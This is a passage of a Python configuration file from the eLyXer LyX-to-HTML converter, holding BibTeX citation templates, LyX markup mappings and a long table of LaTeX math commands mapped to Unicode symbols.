"Configuration class from elyxer.config file"
abbrvnat = {
u'@article': u'$authors. $title. <i>$journal</i>,{ {$volume:}$pages,} $month $year.{ doi: $doi.}{ URL <a href="$url">$url</a>.}{ $note.}',
u'cite': u'$surname($year)',
u'default': u'$authors. <i>$title</i>. $publisher, $year.{ URL <a href="$url">$url</a>.}{ $note.}',
}
alpha = {
u'@article': u'$authors. $title.{ <i>$journal</i>{, {$volume}{($number)}}{: $pages}{, $year}.}{ <a href="$url">$url</a>.}{ <a href="$filename">$filename</a>.}{ $note.}',
u'cite': u'$Sur$YY',
u'default': u'$authors. $title.{ <i>$journal</i>,} $year.{ <a href="$url">$url</a>.}{ <a href="$filename">$filename</a>.}{ $note.}',
}
authordate2 = {
u'@article': u'$authors. $year. $title. <i>$journal</i>, <b>$volume</b>($number), $pages.{ URL <a href="$url">$url</a>.}{ $note.}',
u'@book': u'$authors. $year. <i>$title</i>. $publisher.{ URL <a href="$url">$url</a>.}{ $note.}',
u'cite': u'$surname, $year',
u'default': u'$authors. $year. <i>$title</i>. $publisher.{ URL <a href="$url">$url</a>.}{ $note.}',
}
default = {
u'@article': u'$authors: “$title”, <i>$journal</i>,{ pp. $pages,} $year.{ URL <a href="$url">$url</a>.}{ $note.}',
u'@book': u'{$authors: }<i>$title</i>{ ($editor, ed.)}.{{ $publisher,} $year.}{ URL <a href="$url">$url</a>.}{ $note.}',
u'@booklet': u'$authors: <i>$title</i>.{{ $publisher,} $year.}{ URL <a href="$url">$url</a>.}{ $note.}',
u'@conference': u'$authors: “$title”, <i>$journal</i>,{ pp. $pages,} $year.{ URL <a href="$url">$url</a>.}{ $note.}',
u'@inbook': u'$authors: <i>$title</i>.{{ $publisher,} $year.}{ URL <a href="$url">$url</a>.}{ $note.}',
u'@incollection': u'$authors: <i>$title</i>{ in <i>$booktitle</i>{ ($editor, ed.)}}.{{ $publisher,} $year.}{ URL <a href="$url">$url</a>.}{ $note.}',
u'@inproceedings': u'$authors: “$title”, <i>$booktitle</i>,{ pp. $pages,} $year.{ URL <a href="$url">$url</a>.}{ $note.}',
u'@manual': u'$authors: <i>$title</i>.{{ $publisher,} $year.}{ URL <a href="$url">$url</a>.}{ $note.}',
u'@mastersthesis': u'$authors: <i>$title</i>.{{ $publisher,} $year.}{ URL <a href="$url">$url</a>.}{ $note.}',
u'@misc': u'$authors: <i>$title</i>.{{ $publisher,}{ $howpublished,} $year.}{ URL <a href="$url">$url</a>.}{ $note.}',
u'@phdthesis': u'$authors: <i>$title</i>.{{ $publisher,} $year.}{ URL <a href="$url">$url</a>.}{ $note.}',
u'@proceedings': u'$authors: “$title”, <i>$journal</i>,{ pp. $pages,} $year.{ URL <a href="$url">$url</a>.}{ $note.}',
u'@techreport': u'$authors: <i>$title</i>, $year.{ URL <a href="$url">$url</a>.}{ $note.}',
u'@unpublished': u'$authors: “$title”, <i>$journal</i>, $year.{ URL <a href="$url">$url</a>.}{ $note.}',
u'cite': u'$index',
u'default': u'$authors: <i>$title</i>.{{ $publisher,} $year.}{ URL <a href="$url">$url</a>.}{ $note.}',
}
defaulttags = {
u'YY': u'??', u'authors': u'', u'surname': u'',
}
ieeetr = {
u'@article': u'$authors, “$title”, <i>$journal</i>, vol. $volume, no. $number, pp. $pages, $year.{ URL <a href="$url">$url</a>.}{ $note.}',
u'@book': u'$authors, <i>$title</i>. $publisher, $year.{ URL <a href="$url">$url</a>.}{ $note.}',
u'cite': u'$index',
u'default': u'$authors, “$title”. $year.{ URL <a href="$url">$url</a>.}{ $note.}',
}
plain = {
u'@article': u'$authors. $title.{ <i>$journal</i>{, {$volume}{($number)}}{:$pages}{, $year}.}{ URL <a href="$url">$url</a>.}{ $note.}',
u'@book': u'$authors. <i>$title</i>. $publisher,{ $month} $year.{ URL <a href="$url">$url</a>.}{ $note.}',
u'@incollection': u'$authors. $title.{ In <i>$booktitle</i> {($editor, ed.)}.} $publisher,{ $month} $year.{ URL <a href="$url">$url</a>.}{ $note.}',
u'@inproceedings': u'$authors. $title. { <i>$booktitle</i>{, {$volume}{($number)}}{:$pages}{, $year}.}{ URL <a href="$url">$url</a>.}{ $note.}',
u'cite': u'$index',
u'default': u'{$authors. }$title.{{ $publisher,} $year.}{ URL <a href="$url">$url</a>.}{ $note.}',
}
vancouver = {
u'@article': u'$authors. $title. <i>$journal</i>, $year{;{<b>$volume</b>}{($number)}{:$pages}}.{ URL: <a href="$url">$url</a>.}{ $note.}',
u'@book': u'$authors. $title. {$publisher, }$year.{ URL: <a href="$url">$url</a>.}{ $note.}',
u'cite': u'$index',
u'default': u'$authors. $title; {$publisher, }$year.{ $howpublished.}{ URL: <a href="$url">$url</a>.}{ $note.}',
}
class BibTeXConfig(object):
"Configuration class from elyxer.config file"
replaced = {
u'--': u'—', u'..': u'.',
}
class ContainerConfig(object):
"Configuration class from elyxer.config file"
endings = {
u'Align': u'\\end_layout', u'BarredText': u'\\bar',
u'BoldText': u'\\series', u'Cell': u'</cell',
u'ChangeDeleted': u'\\change_unchanged',
u'ChangeInserted': u'\\change_unchanged', u'ColorText': u'\\color',
u'EmphaticText': u'\\emph', u'Hfill': u'\\hfill', u'Inset': u'\\end_inset',
u'Layout': u'\\end_layout', u'LyXFooter': u'\\end_document',
u'LyXHeader': u'\\end_header', u'Row': u'</row', u'ShapedText': u'\\shape',
u'SizeText': u'\\size', u'StrikeOut': u'\\strikeout',
u'TextFamily': u'\\family', u'VersalitasText': u'\\noun',
}
extracttext = {
u'allowed': [u'StringContainer', u'Constant', u'FormulaConstant',],
u'cloned': [u'',],
u'extracted': [u'PlainLayout', u'TaggedText', u'Align', u'Caption', u'TextFamily', u'EmphaticText', u'VersalitasText', u'BarredText', u'SizeText', u'ColorText', u'LangLine', u'Formula', u'Bracket', u'RawText', u'BibTag', u'FormulaNumber', u'AlphaCommand', u'EmptyCommand', u'OneParamFunction', u'SymbolFunction', u'TextFunction', u'FontFunction', u'CombiningFunction', u'DecoratingFunction', u'FormulaSymbol', u'BracketCommand', u'TeXCode',],
}
startendings = {
u'\\begin_deeper': u'\\end_deeper', u'\\begin_inset': u'\\end_inset',
u'\\begin_layout': u'\\end_layout',
}
starts = {
u'': u'StringContainer', u'#LyX': u'BlackBox', u'</lyxtabular': u'BlackBox',
u'<cell': u'Cell', u'<column': u'Column', u'<row': u'Row',
u'\\align': u'Align', u'\\bar': u'BarredText',
u'\\bar default': u'BlackBox', u'\\bar no': u'BlackBox',
u'\\begin_body': u'BlackBox', u'\\begin_deeper': u'DeeperList',
u'\\begin_document': u'BlackBox', u'\\begin_header': u'LyXHeader',
u'\\begin_inset Argument': u'ShortTitle',
u'\\begin_inset Box': u'BoxInset', u'\\begin_inset Branch': u'Branch',
u'\\begin_inset Caption': u'Caption',
u'\\begin_inset CommandInset bibitem': u'BiblioEntry',
u'\\begin_inset CommandInset bibtex': u'BibTeX',
u'\\begin_inset CommandInset citation': u'BiblioCitation',
u'\\begin_inset CommandInset href': u'URL',
u'\\begin_inset CommandInset include': u'IncludeInset',
u'\\begin_inset CommandInset index_print': u'PrintIndex',
u'\\begin_inset CommandInset label': u'Label',
u'\\begin_inset CommandInset line': u'LineInset',
u'\\begin_inset CommandInset nomencl_print': u'PrintNomenclature',
u'\\begin_inset CommandInset nomenclature': u'NomenclatureEntry',
u'\\begin_inset CommandInset ref': u'Reference',
u'\\begin_inset CommandInset toc': u'TableOfContents',
u'\\begin_inset ERT': u'ERT', u'\\begin_inset Flex': u'FlexInset',
u'\\begin_inset Flex Chunkref': u'NewfangledChunkRef',
u'\\begin_inset Flex Marginnote': u'SideNote',
u'\\begin_inset Flex Sidenote': u'SideNote',
u'\\begin_inset Flex URL': u'FlexURL', u'\\begin_inset Float': u'Float',
u'\\begin_inset FloatList': u'ListOf', u'\\begin_inset Foot': u'Footnote',
u'\\begin_inset Formula': u'Formula',
u'\\begin_inset FormulaMacro': u'FormulaMacro',
u'\\begin_inset Graphics': u'Image',
u'\\begin_inset Index': u'IndexReference',
u'\\begin_inset Info': u'InfoInset',
u'\\begin_inset LatexCommand bibitem': u'BiblioEntry',
u'\\begin_inset LatexCommand bibtex': u'BibTeX',
u'\\begin_inset LatexCommand cite': u'BiblioCitation',
u'\\begin_inset LatexCommand citealt': u'BiblioCitation',
u'\\begin_inset LatexCommand citep': u'BiblioCitation',
u'\\begin_inset LatexCommand citet': u'BiblioCitation',
u'\\begin_inset LatexCommand htmlurl': u'URL',
u'\\begin_inset LatexCommand index': u'IndexReference',
u'\\begin_inset LatexCommand label': u'Label',
u'\\begin_inset LatexCommand nomenclature': u'NomenclatureEntry',
u'\\begin_inset LatexCommand prettyref': u'Reference',
u'\\begin_inset LatexCommand printindex': u'PrintIndex',
u'\\begin_inset LatexCommand printnomenclature': u'PrintNomenclature',
u'\\begin_inset LatexCommand ref': u'Reference',
u'\\begin_inset LatexCommand tableofcontents': u'TableOfContents',
u'\\begin_inset LatexCommand url': u'URL',
u'\\begin_inset LatexCommand vref': u'Reference',
u'\\begin_inset Marginal': u'SideNote',
u'\\begin_inset Newline': u'NewlineInset',
u'\\begin_inset Newpage': u'NewPageInset', u'\\begin_inset Note': u'Note',
u'\\begin_inset OptArg': u'ShortTitle',
u'\\begin_inset Phantom': u'PhantomText',
u'\\begin_inset Quotes': u'QuoteContainer',
u'\\begin_inset Tabular': u'Table', u'\\begin_inset Text': u'InsetText',
u'\\begin_inset VSpace': u'VerticalSpace', u'\\begin_inset Wrap': u'Wrap',
u'\\begin_inset listings': u'Listing',
u'\\begin_inset script': u'ScriptInset', u'\\begin_inset space': u'Space',
u'\\begin_layout': u'Layout', u'\\begin_layout Abstract': u'Abstract',
u'\\begin_layout Author': u'Author',
u'\\begin_layout Bibliography': u'Bibliography',
u'\\begin_layout Chunk': u'NewfangledChunk',
u'\\begin_layout Description': u'Description',
u'\\begin_layout Enumerate': u'ListItem',
u'\\begin_layout Itemize': u'ListItem', u'\\begin_layout List': u'List',
u'\\begin_layout LyX-Code': u'LyXCode',
u'\\begin_layout Plain': u'PlainLayout',
u'\\begin_layout Standard': u'StandardLayout',
u'\\begin_layout Title': u'Title', u'\\begin_preamble': u'LyXPreamble',
u'\\change_deleted': u'ChangeDeleted',
u'\\change_inserted': u'ChangeInserted',
u'\\change_unchanged': u'BlackBox', u'\\color': u'ColorText',
u'\\color inherit': u'BlackBox', u'\\color none': u'BlackBox',
u'\\emph default': u'BlackBox', u'\\emph off': u'BlackBox',
u'\\emph on': u'EmphaticText', u'\\emph toggle': u'EmphaticText',
u'\\end_body': u'LyXFooter', u'\\family': u'TextFamily',
u'\\family default': u'BlackBox', u'\\family roman': u'BlackBox',
u'\\hfill': u'Hfill', u'\\labelwidthstring': u'BlackBox',
u'\\lang': u'LangLine', u'\\length': u'InsetLength',
u'\\lyxformat': u'LyXFormat', u'\\lyxline': u'LyXLine',
u'\\newline': u'Newline', u'\\newpage': u'NewPage',
u'\\noindent': u'BlackBox', u'\\noun default': u'BlackBox',
u'\\noun off': u'BlackBox', u'\\noun on': u'VersalitasText',
u'\\paragraph_spacing': u'BlackBox', u'\\series bold': u'BoldText',
u'\\series default': u'BlackBox', u'\\series medium': u'BlackBox',
u'\\shape': u'ShapedText', u'\\shape default': u'BlackBox',
u'\\shape up': u'BlackBox', u'\\size': u'SizeText',
u'\\size normal': u'BlackBox', u'\\start_of_appendix': u'StartAppendix',
u'\\strikeout default': u'BlackBox', u'\\strikeout on': u'StrikeOut',
}
string = {
u'startcommand': u'\\',
}
table = {
u'headers': [u'<lyxtabular', u'<features',],
}
class EscapeConfig(object):
"Configuration class from elyxer.config file"
chars = {
u'\n': u'', u' -- ': u' — ', u' --- ': u' — ', u'\'': u'’', u'`': u'‘',
}
commands = {
u'\\InsetSpace \\space{}': u' ', u'\\InsetSpace \\thinspace{}': u' ',
u'\\InsetSpace ~': u' ', u'\\SpecialChar \\-': u'',
u'\\SpecialChar \\@.': u'.', u'\\SpecialChar \\ldots{}': u'…',
u'\\SpecialChar \\menuseparator': u' ▷ ',
u'\\SpecialChar \\nobreakdash-': u'-', u'\\SpecialChar \\slash{}': u'/',
u'\\SpecialChar \\textcompwordmark{}': u'', u'\\backslash': u'\\',
}
entities = {
u'&': u'&', u'<': u'<', u'>': u'>',
}
html = {
u'/>': u'>',
}
iso885915 = {
u' ': u' ', u' ': u' ', u' ': u' ',
}
nonunicode = {
u' ': u' ',
}
class FormulaConfig(object):
"Configuration class from elyxer.config file"
alphacommands = {
u'\\AA': u'Å', u'\\AE': u'Æ',
u'\\AmS': u'<span class="versalitas">AmS</span>', u'\\Angstroem': u'Å',
u'\\DH': u'Ð', u'\\Koppa': u'Ϟ', u'\\L': u'Ł', u'\\Micro': u'µ', u'\\O': u'Ø',
u'\\OE': u'Œ', u'\\Sampi': u'Ϡ', u'\\Stigma': u'Ϛ', u'\\TH': u'Þ',
u'\\aa': u'å', u'\\ae': u'æ', u'\\alpha': u'α', u'\\beta': u'β',
u'\\delta': u'δ', u'\\dh': u'ð', u'\\digamma': u'ϝ', u'\\epsilon': u'ϵ',
u'\\eta': u'η', u'\\eth': u'ð', u'\\gamma': u'γ', u'\\i': u'ı',
u'\\imath': u'ı', u'\\iota': u'ι', u'\\j': u'ȷ', u'\\jmath': u'ȷ',
u'\\kappa': u'κ', u'\\koppa': u'ϟ', u'\\l': u'ł', u'\\lambda': u'λ',
u'\\mu': u'μ', u'\\nu': u'ν', u'\\o': u'ø', u'\\oe': u'œ', u'\\omega': u'ω',
u'\\phi': u'φ', u'\\pi': u'π', u'\\psi': u'ψ', u'\\rho': u'ρ',
u'\\sampi': u'ϡ', u'\\sigma': u'σ', u'\\ss': u'ß', u'\\stigma': u'ϛ',
u'\\tau': u'τ', u'\\tcohm': u'Ω', u'\\textcrh': u'ħ', u'\\th': u'þ',
u'\\theta': u'θ', u'\\upsilon': u'υ', u'\\varDelta': u'∆',
u'\\varGamma': u'Γ', u'\\varLambda': u'Λ', u'\\varOmega': u'Ω',
u'\\varPhi': u'Φ', u'\\varPi': u'Π', u'\\varPsi': u'Ψ', u'\\varSigma': u'Σ',
u'\\varTheta': u'Θ', u'\\varUpsilon': u'Υ', u'\\varXi': u'Ξ',
u'\\varbeta': u'ϐ', u'\\varepsilon': u'ε', u'\\varkappa': u'ϰ',
u'\\varphi': u'φ', u'\\varpi': u'ϖ', u'\\varrho': u'ϱ', u'\\varsigma': u'ς',
u'\\vartheta': u'ϑ', u'\\xi': u'ξ', u'\\zeta': u'ζ',
}
array = {
u'begin': u'\\begin', u'cellseparator': u'&', u'end': u'\\end',
u'rowseparator': u'\\\\',
}
bigbrackets = {
u'(': [u'⎛', u'⎜', u'⎝',], u')': [u'⎞', u'⎟', u'⎠',], u'[': [u'⎡', u'⎢', u'⎣',],
u']': [u'⎤', u'⎥', u'⎦',], u'{': [u'⎧', u'⎪', u'⎨', u'⎩',], u'|': [u'|',],
u'}': [u'⎫', u'⎪', u'⎬', u'⎭',], u'∥': [u'∥',],
}
bigsymbols = {
u'∑': [u'⎲', u'⎳',], u'∫': [u'⌠', u'⌡',],
}
bracketcommands = {
u'\\left': u'span class="symbol"',
u'\\left.': u'<span class="leftdot"></span>',
u'\\middle': u'span class="symbol"', u'\\right': u'span class="symbol"',
u'\\right.': u'<span class="rightdot"></span>',
}
combiningfunctions = {
u'\\"': u'̈', u'\\\'': u'́', u'\\^': u'̂', u'\\`': u'̀', u'\\acute': u'́',
u'\\bar': u'̄', u'\\breve': u'̆', u'\\c': u'̧', u'\\check': u'̌',
u'\\dddot': u'⃛', u'\\ddot': u'̈', u'\\dot': u'̇', u'\\grave': u'̀',
u'\\hat': u'̂', u'\\mathring': u'̊', u'\\overleftarrow': u'⃖',
u'\\overrightarrow': u'⃗', u'\\r': u'̊', u'\\s': u'̩',
u'\\textcircled': u'⃝', u'\\textsubring': u'̥', u'\\tilde': u'̃',
u'\\v': u'̌', u'\\vec': u'⃗', u'\\~': u'̃',
}
commands = {
u'\\ ': u' ', u'\\!': u'', u'\\#': u'#', u'\\$': u'$', u'\\%': u'%',
u'\\&': u'&', u'\\,': u' ', u'\\:': u' ', u'\\;': u' ', u'\\AC': u'∿',
u'\\APLcomment': u'⍝', u'\\APLdownarrowbox': u'⍗', u'\\APLinput': u'⍞',
u'\\APLinv': u'⌹', u'\\APLleftarrowbox': u'⍇', u'\\APLlog': u'⍟',
u'\\APLrightarrowbox': u'⍈', u'\\APLuparrowbox': u'⍐', u'\\Box': u'□',
u'\\Bumpeq': u'≎', u'\\CIRCLE': u'●', u'\\Cap': u'⋒',
u'\\CapitalDifferentialD': u'ⅅ', u'\\CheckedBox': u'☑', u'\\Circle': u'○',
u'\\Coloneqq': u'⩴', u'\\ComplexI': u'ⅈ', u'\\ComplexJ': u'ⅉ',
u'\\Corresponds': u'≙', u'\\Cup': u'⋓', u'\\Delta': u'Δ', u'\\Diamond': u'◇',
u'\\Diamondblack': u'◆', u'\\Diamonddot': u'⟐', u'\\DifferentialD': u'ⅆ',
u'\\Downarrow': u'⇓', u'\\EUR': u'€', u'\\Euler': u'ℇ',
u'\\ExponetialE': u'ⅇ', u'\\Finv': u'Ⅎ', u'\\Game': u'⅁', u'\\Gamma': u'Γ',
u'\\Im': u'ℑ', u'\\Join': u'⨝', u'\\LEFTCIRCLE': u'◖', u'\\LEFTcircle': u'◐',
u'\\LHD': u'◀', u'\\Lambda': u'Λ', u'\\Lbag': u'⟅', u'\\Leftarrow': u'⇐',
u'\\Lleftarrow': u'⇚', u'\\Longleftarrow': u'⟸',
u'\\Longleftrightarrow': u'⟺', u'\\Longrightarrow': u'⟹', u'\\Lparen': u'⦅',
u'\\Lsh': u'↰', u'\\Mapsfrom': u'⇐|', u'\\Mapsto': u'|⇒', u'\\Omega': u'Ω',
u'\\P': u'¶', u'\\Phi': u'Φ', u'\\Pi': u'Π', u'\\Pr': u'Pr', u'\\Psi': u'Ψ',
u'\\Qoppa': u'Ϙ', u'\\RHD': u'▶', u'\\RIGHTCIRCLE': u'◗',
u'\\RIGHTcircle': u'◑', u'\\Rbag': u'⟆', u'\\Re': u'ℜ', u'\\Rparen': u'⦆',
u'\\Rrightarrow': u'⇛', u'\\Rsh': u'↱', u'\\S': u'§', u'\\Sigma': u'Σ',
u'\\Square': u'☐', u'\\Subset': u'⋐', u'\\Sun': u'☉', u'\\Supset': u'⋑',
u'\\Theta': u'Θ', u'\\Uparrow': u'⇑', u'\\Updownarrow': u'⇕',
u'\\Upsilon': u'Υ', u'\\Vdash': u'⊩', u'\\Vert': u'∥', u'\\Vvdash': u'⊪',
u'\\XBox': u'☒', u'\\Xi': u'Ξ', u'\\Yup': u'⅄', u'\\\\': u'<br/>',
u'\\_': u'_', u'\\aleph': u'ℵ', u'\\amalg': u'∐', u'\\anchor': u'⚓',
u'\\angle': u'∠', u'\\aquarius': u'♒', u'\\arccos': u'arccos',
u'\\arcsin': u'arcsin', u'\\arctan': u'arctan', u'\\arg': u'arg',
u'\\aries': u'♈', u'\\arrowbullet': u'➢', u'\\ast': u'∗', u'\\asymp': u'≍',
u'\\backepsilon': u'∍', u'\\backprime': u'‵', u'\\backsimeq': u'⋍',
u'\\backslash': u'\\', u'\\ballotx': u'✗', u'\\barwedge': u'⊼',
u'\\because': u'∵', u'\\beth': u'ℶ', u'\\between': u'≬', u'\\bigcap': u'∩',
u'\\bigcirc': u'○', u'\\bigcup': u'∪', u'\\bigodot': u'⊙',
u'\\bigoplus': u'⊕', u'\\bigotimes': u'⊗', u'\\bigsqcup': u'⊔',
u'\\bigstar': u'★', u'\\bigtriangledown': u'▽', u'\\bigtriangleup': u'△',
u'\\biguplus': u'⊎', u'\\bigvee': u'∨', u'\\bigwedge': u'∧',
u'\\biohazard': u'☣', u'\\blacklozenge': u'⧫', u'\\blacksmiley': u'☻',
u'\\blacksquare': u'■', u'\\blacktriangle': u'▲',
u'\\blacktriangledown': u'▼', u'\\blacktriangleleft': u'◂',
u'\\blacktriangleright': u'▶', u'\\blacktriangleup': u'▴', u'\\bot': u'⊥',
u'\\bowtie': u'⋈', u'\\box': u'▫', u'\\boxast': u'⧆', u'\\boxbar': u'◫',
u'\\boxbox': u'⧈', u'\\boxbslash': u'⧅', u'\\boxcircle': u'⧇',
u'\\boxdot': u'⊡', u'\\boxminus': u'⊟', u'\\boxplus': u'⊞',
u'\\boxslash': u'⧄', u'\\boxtimes': u'⊠', u'\\bullet': u'•',
u'\\bumpeq': u'≏', u'\\cancer': u'♋', u'\\cap': u'∩', u'\\capricornus': u'♑',
u'\\cat': u'⁀', u'\\cdot': u'⋅', u'\\cdots': u'⋯', u'\\cent': u'¢',
u'\\centerdot': u'∙', u'\\checkmark': u'✓', u'\\chi': u'χ', u'\\circ': u'∘',
u'\\circeq': u'≗', u'\\circlearrowleft': u'↺', u'\\circlearrowright': u'↻',
u'\\circledR': u'®', u'\\circledast': u'⊛', u'\\circledbslash': u'⦸',
u'\\circledcirc': u'⊚', u'\\circleddash': u'⊝', u'\\circledgtr': u'⧁',
u'\\circledless': u'⧀', u'\\clubsuit': u'♣', u'\\colon': u': ', u'\\coloneqq': u'≔',
u'\\complement': u'∁', u'\\cong': u'≅', u'\\coprod': u'∐',
u'\\copyright': u'©', u'\\cos': u'cos', u'\\cosh': u'cosh', u'\\cot': u'cot',
u'\\coth': u'coth', u'\\csc': u'csc', u'\\cup': u'∪', u'\\curlyvee': u'⋎',
u'\\curlywedge': u'⋏', u'\\curvearrowleft': u'↶',
u'\\curvearrowright': u'↷', u'\\dag': u'†', u'\\dagger': u'†',
u'\\daleth': u'ℸ', u'\\dashleftarrow': u'⇠', u'\\dashv': u'⊣',
u'\\ddag': u'‡', u'\\ddagger': u'‡', u'\\ddots': u'⋱', u'\\deg': u'deg',
u'\\det': u'det', u'\\diagdown': u'╲', u'\\diagup': u'╱',
u'\\diameter': u'⌀', u'\\diamond': u'◇', u'\\diamondsuit': u'♦',
u'\\dim': u'dim', u'\\div': u'÷', u'\\divideontimes': u'⋇',
u'\\dotdiv': u'∸', u'\\doteq': u'≐', u'\\doteqdot': u'≑', u'\\dotplus': u'∔',
u'\\dots': u'…', u'\\doublebarwedge': u'⌆', u'\\downarrow': u'↓',
u'\\downdownarrows': u'⇊', u'\\downharpoonleft': u'⇃',
u'\\downharpoonright': u'⇂', u'\\dsub': u'⩤', u'\\earth': u'♁',
u'\\eighthnote': u'♪', u'\\ell': u'ℓ', u'\\emptyset': u'∅',
u'\\eqcirc': u'≖', u'\\eqcolon': u'≕', u'\\eqsim': u'≂', u'\\euro': u'€',
u'\\exists': u'∃', u'\\exp': u'exp', u'\\fallingdotseq': u'≒',
u'\\fcmp': u'⨾', u'\\female': u'♀', u'\\flat': u'♭', u'\\forall': u'∀',
u'\\fourth': u'⁗', u'\\frown': u'⌢', u'\\frownie': u'☹', u'\\gcd': u'gcd',
u'\\gemini': u'♊', u'\\geq)': u'≥', u'\\geqq': u'≧', u'\\geqslant': u'≥',
u'\\gets': u'←', u'\\gg': u'≫', u'\\ggg': u'⋙', u'\\gimel': u'ℷ',
u'\\gneqq': u'≩', u'\\gnsim': u'⋧', u'\\gtrdot': u'⋗', u'\\gtreqless': u'⋚',
u'\\gtreqqless': u'⪌', u'\\gtrless': u'≷', u'\\gtrsim': u'≳',
u'\\guillemotleft': u'«', u'\\guillemotright': u'»', u'\\hbar': u'ℏ',
u'\\heartsuit': u'♥', u'\\hfill': u'<span class="hfill"> </span>',
u'\\hom': u'hom', u'\\hookleftarrow': u'↩', u'\\hookrightarrow': u'↪',
u'\\hslash': u'ℏ', u'\\idotsint': u'<span class="bigsymbol">∫⋯∫</span>',
u'\\iiint': u'<span class="bigsymbol">∭</span>',
u'\\iint': u'<span class="bigsymbol">∬</span>', u'\\imath': u'ı',
u'\\inf': u'inf', u'\\infty': u'∞', u'\\intercal': u'⊺',
u'\\interleave': u'⫴', u'\\invamp': u'⅋', u'\\invneg': u'⌐',
u'\\jmath': u'ȷ', u'\\jupiter': u'♃', u'\\ker': u'ker', u'\\land': u'∧',
u'\\landupint': u'<span class="bigsymbol">∱</span>', u'\\lang': u'⟪',
u'\\langle': u'⟨', u'\\lblot': u'⦉', u'\\lbrace': u'{', u'\\lbrace)': u'{',
u'\\lbrack': u'[', u'\\lceil': u'⌈', u'\\ldots': u'…', u'\\leadsto': u'⇝',
u'\\leftarrow)': u'←', u'\\leftarrowtail': u'↢', u'\\leftarrowtobar': u'⇤',
u'\\leftharpoondown': u'↽', u'\\leftharpoonup': u'↼',
u'\\leftleftarrows': u'⇇', u'\\leftleftharpoons': u'⥢', u'\\leftmoon': u'☾',
u'\\leftrightarrow': u'↔', u'\\leftrightarrows': u'⇆',
u'\\leftrightharpoons': u'⇋', u'\\leftthreetimes': u'⋋', u'\\leo': u'♌',
u'\\leq)': u'≤', u'\\leqq': u'≦', u'\\leqslant': u'≤', u'\\lessdot': u'⋖',
u'\\lesseqgtr': u'⋛', u'\\lesseqqgtr': u'⪋', u'\\lessgtr': u'≶',
u'\\lesssim': u'≲', u'\\lfloor': u'⌊', u'\\lg': u'lg', u'\\lgroup': u'⟮',
u'\\lhd': u'⊲', u'\\libra': u'♎', u'\\lightning': u'↯', u'\\limg': u'⦇',
u'\\liminf': u'liminf', u'\\limsup': u'limsup', u'\\ll': u'≪',
u'\\llbracket': u'⟦', u'\\llcorner': u'⌞', u'\\lll': u'⋘', u'\\ln': u'ln',
u'\\lneqq': u'≨', u'\\lnot': u'¬', u'\\lnsim': u'⋦', u'\\log': u'log',
u'\\longleftarrow': u'⟵', u'\\longleftrightarrow': u'⟷',
u'\\longmapsto': u'⟼', u'\\longrightarrow': u'⟶', u'\\looparrowleft': u'↫',
u'\\looparrowright': u'↬', u'\\lor': u'∨', u'\\lozenge': u'◊',
u'\\lrcorner': u'⌟', u'\\ltimes': u'⋉', u'\\lyxlock': u'', u'\\male': u'♂',
u'\\maltese': u'✠', u'\\mapsfrom': u'↤', u'\\mapsto': u'↦',
u'\\mathcircumflex': u'^', u'\\max': u'max', u'\\measuredangle': u'∡',
u'\\medbullet': u'⚫', u'\\medcirc': u'⚪', u'\\mercury': u'☿', u'\\mho': u'℧',
u'\\mid': u'∣', u'\\min': u'min', u'\\models': u'⊨', u'\\mp': u'∓',
u'\\multimap': u'⊸', u'\\nLeftarrow': u'⇍', u'\\nLeftrightarrow': u'⇎',
u'\\nRightarrow': u'⇏', u'\\nVDash': u'⊯', u'\\nabla': u'∇',
u'\\napprox': u'≉', u'\\natural': u'♮', u'\\ncong': u'≇', u'\\nearrow': u'↗',
u'\\neg': u'¬', u'\\neg)': u'¬', u'\\neptune': u'♆', u'\\nequiv': u'≢',
u'\\newline': u'<br/>', u'\\nexists': u'∄', u'\\ngeqslant': u'≱',
u'\\ngtr': u'≯', u'\\ngtrless': u'≹', u'\\ni': u'∋', u'\\ni)': u'∋',
u'\\nleftarrow': u'↚', u'\\nleftrightarrow': u'↮', u'\\nleqslant': u'≰',
u'\\nless': u'≮', u'\\nlessgtr': u'≸', u'\\nmid': u'∤', u'\\nolimits': u'',
u'\\nonumber': u'', u'\\not': u'¬', u'\\not<': u'≮', u'\\not=': u'≠',
u'\\not>': u'≯', u'\\notbackslash': u'⍀', u'\\notin': u'∉', u'\\notni': u'∌',
u'\\notslash': u'⌿', u'\\nparallel': u'∦', u'\\nprec': u'⊀',
u'\\nrightarrow': u'↛', u'\\nsim': u'≁', u'\\nsimeq': u'≄',
u'\\nsqsubset': u'⊏̸', u'\\nsubseteq': u'⊈', u'\\nsucc': u'⊁',
u'\\nsucccurlyeq': u'⋡', u'\\nsupset': u'⊅', u'\\nsupseteq': u'⊉',
u'\\ntriangleleft': u'⋪', u'\\ntrianglelefteq': u'⋬',
u'\\ntriangleright': u'⋫', u'\\ntrianglerighteq': u'⋭', u'\\nvDash': u'⊭',
u'\\nvdash': u'⊬', u'\\nwarrow': u'↖', u'\\odot': u'⊙',
u'\\officialeuro': u'€', u'\\oiiint': u'<span class="bigsymbol">∰</span>',
u'\\oiint': u'<span class="bigsymbol">∯</span>',
u'\\oint': u'<span class="bigsymbol">∮</span>',
u'\\ointclockwise': u'<span class="bigsymbol">∲</span>',
u'\\ointctrclockwise': u'<span class="bigsymbol">∳</span>',
u'\\ominus': u'⊖', u'\\oplus': u'⊕', u'\\oslash': u'⊘', u'\\otimes': u'⊗',
u'\\owns': u'∋', u'\\parallel': u'∥', u'\\partial': u'∂', u'\\pencil': u'✎',
u'\\perp': u'⊥', u'\\pisces': u'♓', u'\\pitchfork': u'⋔', u'\\pluto': u'♇',
u'\\pm': u'±', u'\\pointer': u'➪', u'\\pointright': u'☞', u'\\pounds': u'£',
u'\\prec': u'≺', u'\\preccurlyeq': u'≼', u'\\preceq': u'≼',
u'\\precsim': u'≾', u'\\prime': u'′', u'\\prompto': u'∝', u'\\qoppa': u'ϙ',
u'\\qquad': u' ', u'\\quad': u' ', u'\\quarternote': u'♩',
u'\\radiation': u'☢', u'\\rang': u'⟫', u'\\rangle': u'⟩', u'\\rblot': u'⦊',
u'\\rbrace': u'}', u'\\rbrace)': u'}', u'\\rbrack': u']', u'\\rceil': u'⌉',
u'\\recycle': u'♻', u'\\rfloor': u'⌋', u'\\rgroup': u'⟯', u'\\rhd': u'⊳',
u'\\rightangle': u'∟', u'\\rightarrow)': u'→', u'\\rightarrowtail': u'↣',
u'\\rightarrowtobar': u'⇥', u'\\rightharpoondown': u'⇁',
u'\\rightharpoonup': u'⇀', u'\\rightharpooondown': u'⇁',
u'\\rightharpooonup': u'⇀', u'\\rightleftarrows': u'⇄',
u'\\rightleftharpoons': u'⇌', u'\\rightmoon': u'☽',
u'\\rightrightarrows': u'⇉', u'\\rightrightharpoons': u'⥤',
